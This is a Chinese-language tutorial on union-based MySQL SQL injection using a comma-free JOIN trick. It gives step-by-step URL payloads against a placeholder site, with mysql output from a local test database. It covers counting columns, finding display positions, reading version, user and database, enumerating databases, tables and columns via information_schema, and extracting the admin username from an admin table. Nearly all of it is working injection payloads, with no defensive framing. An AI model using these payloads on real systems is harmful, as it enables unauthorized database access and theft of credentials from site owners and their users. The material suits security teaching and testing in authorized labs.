0x00 概要

在页面有显示位的情况下使用

0x01 记忆方式

  1. mysql> select * from test where id=-1 union select * from (
  2. (select 1)A join
  3. (select 2)B join
  4. (select 3)C join
  5. (select 4)D
  6. );
  7. +------+------+------+---------+
  8. | id | test | map | content |
  9. +------+------+------+---------+
  10. | 1 | 2 | 3 | 4 |
  11. +------+------+------+---------+
  12. 1 row in set (0.00 sec)

0x02 测试表数据

  1. # 测试表数据: test;
  2. mysql> select * from test;
  3. +------+------+------+---------+
  4. | id | test | map | content |
  5. +------+------+------+---------+
  6. | 1 | 1 | 1 | 1 |
  7. | 2 | 2 | 2 | 2 |
  8. | 3 | 3 | 3 | 3 |
  9. +------+------+------+---------+
  10. 3 rows in set (0.00 sec)
  1. # 测试管理表: tdb_admin;
  2. mysql> select * from tdb_admin;
  3. +----+----------+----------------------------------+
  4. | id | username | password |
  5. +----+----------+----------------------------------+
  6. | 1 | admin | 7fef6171469e80d32c0559f88b377245 |
  7. +----+----------+----------------------------------+
  8. 1 row in set (0.00 sec)

0x03 查看列数

web语句: http://www.test.com/sql.php?id=1 order by 4

数据库语句: select * from test where id = 1 order by 4;

  1. # 列数正确时
  2. mysql> select * from test where id = 1 order by 4;
  3. +------+------+------+---------+
  4. | id | test | map | content |
  5. +------+------+------+---------+
  6. | 1 | 1 | 1 | 1 |
  7. +------+------+------+---------+
  8. 1 row in set (0.00 sec)
  1. # 列数超出时
  2. mysql> select * from test where id = 1 order by 5;
  3. ERROR 1054 (42S22): Unknown column '5' in 'order clause'

test 表字段4个所以 order by 4 即可多了会报错,报错就把数量自己减少到不报错即可

0x04 显示列数

web语句: http://www.test.com/sql.php?id=-1 union select * from ((select 1)A join (select 2)B join (select 3)C join (select 4)D)

数据库语句: select from test where id=-1 union select from ((select 1)A join (select 2)B join (select 3)C join (select 4)D);

  1. mysql> select * from test where id=-1 union select * from (
  2. (select 1)A join
  3. (select 2)B join
  4. (select 3)C join
  5. (select 4)D
  6. );
  7. +------+------+------+---------+
  8. | id | test | map | content |
  9. +------+------+------+---------+
  10. | 1 | 2 | 3 | 4 |
  11. +------+------+------+---------+
  12. 1 row in set (0.00 sec)

注: 我的test表一共就四个字段,所以join 4次即可,实战中如果有5个字段,那就join 5次即可

0x05 读取数据库版本/当前连接用户/当前连接的数据库

web语句: http://www.test.com/sql.php?id=-1 union select * from ((select version())A join (select user())B join (select database())C join (select 4)D)

数据库语句: select from test where id=-1 union select from ((select version())A join (select user())B join (select database())C join (select 4)D);

  1. mysql> select * from test where id=-1 union select * from (
  2. (select version())A join
  3. (select user())B join
  4. (select database())C join
  5. (select 4)D
  6. );
  7. +--------+----------------+------+---------+
  8. | id | test | map | content |
  9. +--------+----------------+------+---------+
  10. | 5.5.53 | root@localhost | test | 4 |
  11. +--------+----------------+------+---------+
  12. 1 row in set (0.00 sec)

0x06 爆库名

注意: LIMIT 0 修改会显示其他库名
例如:
修改为0 就是出1库
修改为1 就是出2库

web语句: http://www.test.com/sql.php?id=-1 union select * from ((select schema_name from information_schema.schemata limit 1 offset 0)A join (select 2)B join (select 3)C join (select 4)D)

数据库语句: select from test where id=-1 union select from ((select schema_name from information_schema.schemata limit 1 offset 0)A join (select 2)B join (select 3)C join (select 4)D)

  1. # 一库
  2. mysql> select * from test where id=-1 union select * from (
  3. (select schema_name from information_schema.schemata limit 1 offset 0)A join
  4. (select 2)B join
  5. (select 3)C join (select 4)D
  6. );
  7. +--------------------+------+------+---------+
  8. | id | test | map | content |
  9. +--------------------+------+------+---------+
  10. | information_schema | 2 | 3 | 4 |
  11. +--------------------+------+------+---------+
  12. 1 row in set (0.00 sec)
  1. # 二库
  2. mysql> select * from test where id=-1 union select * from (
  3. (select schema_name from information_schema.schemata limit 1 offset 1)A join
  4. (select 2)B join
  5. (select 3)C join (select 4)D
  6. );
  7. +-------+------+------+---------+
  8. | id | test | map | content |
  9. +-------+------+------+---------+
  10. | 74cms | 2 | 3 | 4 |
  11. +-------+------+------+---------+
  12. 1 row in set (0.00 sec)

0x07 爆表名

注意: table_schema=xxx 修改为其他库会爆出其他库的数据
例如:
table_schema=database() 会获取当前连接的库数据
table_schema=’test’ 会获取test库数据

web语句: http://www.test.com/sql.php?id= -1 union select * from (
(select table_name from information_schema.tables where table_schema=DATABASE() limit 1 offset 0)A join
(select 2)B join
(select 3)C join
(select 4)D
);

数据库语句: select from test where id=-1 union select from (
(select table_name from information_schema.tables where table_schema=DATABASE() limit 1 offset 0)A join
(select 2)B join
(select 3)C join
(select 4)D
);

  1. mysql> select * from test where id=-1 union select * from (
  2. (select table_name from information_schema.tables where table_schema=DATABASE() limit 1 offset 0)A join
  3. (select 2)B join
  4. (select 3)C join
  5. (select 4)D
  6. );
  7. +-----------+------+------+---------+
  8. | id | test | map | content |
  9. +-----------+------+------+---------+
  10. | tdb_admin | 2 | 3 | 4 |
  11. +-----------+------+------+---------+
  12. 1 row in set (0.00 sec)

0x08 暴字段

table_schema = “xx” 要爆的数据库名
table_name = “xx” 要爆的表名

offset 0 表示要爆的位置
例如:
表tdb_admin的字段为 id,usernam,password
offset 0 = id
offset 1 = username
offset 2 = password

web语句: http://www.test.com/sql.php?id= -1 union select * from (
(select column_name from information_schema.columns where table_schema=DATABASE() AND table_name=’tdb_admin’ limit 1 offset 0)A join
(select 2)B join
(select 3)C join
(select 4)D
)

数据库语句: select from test where id=-1 union select from (
(select column_name from information_schema.columns where table_schema=DATABASE() AND table_name=’tdb_admin’ limit 1 offset 0)A join
(select 2)B join
(select 3)C join
(select 4)D
)

  1. # 字段1
  2. mysql> select * from test where id=-1 union select * from (
  3. (select column_name from information_schema.columns where table_schema=DATABASE() AND table_name='tdb_admin' limit 1 offset 0)A join
  4. (select 2)B join
  5. (select 3)C join
  6. (select 4)D
  7. );
  8. +------+------+------+---------+
  9. | id | test | map | content |
  10. +------+------+------+---------+
  11. | id | 2 | 3 | 4 |
  12. +------+------+------+---------+
  13. 1 row in set (0.00 sec)
  1. # 字段2
  2. mysql> select * from test where id=-1 union select * from (
  3. (select column_name from information_schema.columns where table_schema=DATABASE() AND table_name='tdb_admin' limit 1 offset 1)A join
  4. (select 2)B join
  5. (select 3)C join
  6. (select 4)D
  7. );
  8. +----------+------+------+---------+
  9. | id | test | map | content |
  10. +----------+------+------+---------+
  11. | username | 2 | 3 | 4 |
  12. +----------+------+------+---------+
  13. 1 row in set (0.00 sec)

0x08 爆内容

注意: offset 0 表示要显示那一条数据
offset 0 表示第一条
offset 1 表示第二条

web语句: http://www.test.com/sql.php?id= -1 union select * from (
(select (select username from test.tdb_admin limit 1 offset 0))A join
(select 2)B join
(select 3)C join
(select 4)D
)

数据库语句: select from test where id=-1 union select from (
(select (select username from test.tdb_admin limit 1 offset 0))A join
(select 2)B join
(select 3)C join
(select 4)D
)

  1. mysql> select * from test where id=-1 union select * from (
  2. (select (select username from test.tdb_admin limit 1 offset 0))A join
  3. (select 2)B join
  4. (select 3)C join
  5. (select 4)D
  6. )
  7. +-------+------+------+---------+
  8. | id | test | map | content |
  9. +-------+------+------+---------+
  10. | admin | 2 | 3 | 4 |
  11. +-------+------+------+---------+
  12. 1 row in set (0.00 sec)